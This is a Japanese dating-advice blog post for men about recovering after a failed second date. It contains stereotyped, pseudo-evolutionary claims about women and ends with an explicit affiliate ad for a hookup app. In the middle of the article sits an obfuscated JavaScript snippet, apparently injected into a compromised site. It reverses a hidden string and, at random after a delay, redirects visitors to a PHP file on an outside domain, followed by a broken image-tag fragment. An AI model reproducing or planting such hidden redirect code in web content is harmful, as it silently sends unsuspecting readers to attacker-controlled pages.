2回目のデートで失敗した!挽回する方法はあるのか?

  • このエントリーをはてなブックマークに追加
  • Pocket

「2回目のデート以降気になっていた子からLINEが返ってこない」
「好きな女の子との2回目のデート以降LINEの返信がそっけない」
「次のデートに誘ってもやんわり断られる」

上のような経験から「デートに失敗した」と感じる人も多いでしょう。LINEでの連絡が返ってこなかったり、そっけなくなったりするのは、ずばりあなたにもう興味がない証拠です…

悲しいですね。

もしくは別に気になる別の男が現れたのでしょう。少しでもあなたのことが気になっていれば、LINEは返します。あなたもそうしますよね。

「でもどうしても諦められない」「どうにか挽回したい」

そんなみなさんの願いに答えるべく、ここでは2回目のデートで失敗したと感じた人が挽回する方法を紹介していきます。

デートする前の関係性によって挽回できるかどうかが決まる

結論から伝えると、デートする前の女の子との関係性によって挽回できるかどうかが決まります。関係性を下2つに分けて考えます。

1.知り合ったばかりの場合
2.デートする前から友達や同僚の場合

それぞれ下で詳しく説明します。

1.知り合ったばかりの場合は挽回できる可能性はほぼない

いきなり厳しいことを伝えます。知り合ったばかりでデート以降にLINEが返ってこない場合、挽回できる可能性はほぼないです。合コンや街コン、相席居酒屋、マッチングアプリで出会った女の子です。あとは友達の紹介で知り合った場合も関係性が弱いですね。

上での伝えましたが、連絡を返さない、またはそっけなくなるのはあなたに興味がない証拠です。2回のデートを経て恋愛対象として見られなかったわけです。

「付き合っても良いかも」
「好きかも」
「男としていい感じ」

と感じていたら連絡は返します。デートした女の子と毎日会う環境(同じ職場や学校)でない限り挽回できる可能性はほぼないでしょう。

潔く諦めて次の恋愛に目を向けることをおすすめします。「どうしても諦められない」という人は、時間をおいてLINEでメッセージを送ってみましょう。

1ヶ月ぐらい期間は開けると良いです。返信があればラッキーぐらいの感覚で送ればダメージは少なくすみます。

たくさんの男とデートしていて選び放題だった女の子が、自分の好みの人から選ばれなかった時、時間を開けてLINEを送る戦略は効果を発揮します。

2.デートする前から友達の場合は挽回できる可能性あり

反対にデートする前から友達や同僚で、関係性がある場合は挽回できる可能性があります。なぜならその女の子とまだ会える可能性があるからです。

関係性が弱く、出会ったばかりの場合は予定を立てないと会うことができません。つまり連絡が途絶えた時点で挽回が難しくなるんです。

でもデートした女の子が友達や同僚ならまた会う機会があります。会った時にデートの失敗を素直に謝る、そして次のデートに直接誘うことができるわけですね。

複数人で遊んでいるときや、職場でデートのことを誤ったり、次のデートに誘うのは勇気がいります。でもどうしてもその女性と付き合いたいなら、うじうじしていてもはじまりません。今までの人生で発揮したことのないような勇気を出しましょう。

男女によっての2回目のデートの意味合いは変わる

この男女の違いを認識することはとても重要。挽回するときにも、別の女の子とデートするときにも活用できるのでここで覚えましょう。

男にとっての2回目のデートと女の子にとっての2回目のデートでは意味合いが若干違います。男の場合、2回目のデートに誘う子はかなり気に入ってますよね。

1回目のデートで気に入って2回目のデートに誘うことがほとんどだと思います。1回目のデートに誘う前からその女の子のことを好きになっていることすらあるので、2回目のデートをするのは「好き」な状態がほとんどでしょう。

一方女の子にとっての2回目のデートはまだお試しデートです。「好き」までの気持ちはないけど、まあまあ異性として良いと思っている。ぐらいの感覚です。その他女の子の心理が下です。

2回目のデートでOKする女の子心理
– 1回目のデートは楽しかったから2回目も行ってみようかな
– 彼氏候補としてありかなしか判断したい
– もっと深い話をして価値観が知りたい
– 暇だしとりあえず行ってみようかな

男女で2回目のデートに温度差がありますね。女の子は2回目のデートだからと浮かれたりはしないんです。すごく冷静。女の子は本能的に男の内面までしっかり見ています。

女の子は子供を授かると10ヶ月ほど体調が良くなかったり、お腹が大きくなるので、働けなくなります。狩猟時代から、その間しっかりと食べ物を供給してくれたり、身の安全を保証してくれる男かどうか見極める必要があったのです。

だから女の子は男よりも慎重に恋愛をします。これが2回目のデートの男女の温度差となって現れるのです。

気になる子からの評価を挽回したいなら反省は必須

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokonobonnoImg.jpg” alt=”” />

もしあなたが元から関係性のあった女の子とのデートで失敗を感じている場合、次のデートで挽回する必要があります。LINEで3回目もデートに誘い出すことに失敗しても、直接会った時にデートに誘いましょう。

3回目のデートで失敗を挽回したいなら、2回目のデートの反省は必須です。2回目のデートのプラン、当日の行動、会話、詳細まで思い出して一つ一つ振り返りましょう。それもあなた目線で振り返るのではなく、すべて女の子目線で振り返ることが大切。

振り返って「ダメだったな」「失敗したな」と思う部分があれば、必ず3回目のデートでは改善しましょう。1人でデートの反省をするのは難しいので、女の子が気にするポイントを下にまとめました。

これを見ながら振り返ってください。

女の子がデート中に気にするポイント
– デートプランは自分だけが楽しめるものではなかったか(女性に合わせているか)
– 食事するお店はチェーン店やファミレスではないか
– 当日遅刻してないか
– 当日の身だしなみは整えたか(髪の毛、鼻毛、臭い、ファッション)
– 女性目線で清潔感のあるコーディネートだったか
– 当日は女性まかせになっていなかったか(どこいく?なにする?など)
– 自分勝手な行動をしていないか
– 自分の話ばかりしていないか(女性に話してもらう、女性に質問する)
– 相手の目を見て会話したか
– センシティブな内容の質問をしていないか
– 気まずい沈黙の時間はなかったか
– 店員さんに対して横柄な態度をとっていないか
– お会計で1円単位の割り勘にしていないか
– お酒を飲みすぎて酔っ払っていないか

自分の置かれている状況を客観的に判断して行動しよう

2回目のデートで失敗したけど挽回したい男のみなさん、自分の置かれている状況を正しく判断して次の行動に活かしてください。

実は僕も2回目のデートで失敗したことがあります。だからみなさんのどうしても諦められない気持ちが良くわかります。でも上での伝えたとおり、関係性が薄い場合は潔く諦めてください。

2回目のデートをきちんと振り返って、次の新しい恋愛に向けて準備です。デートした女の子と関係性が元々ある人は、まだまだ諦めてはいけません。直接会えるのはチャンスです。悔いが残らないよう、ただがっつき過ぎずに攻めましょう。好きな人と付き合って幸せになってください。

この記事を読んだみなさんの恋愛がうまくいくことを陰ながら応援しています!

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。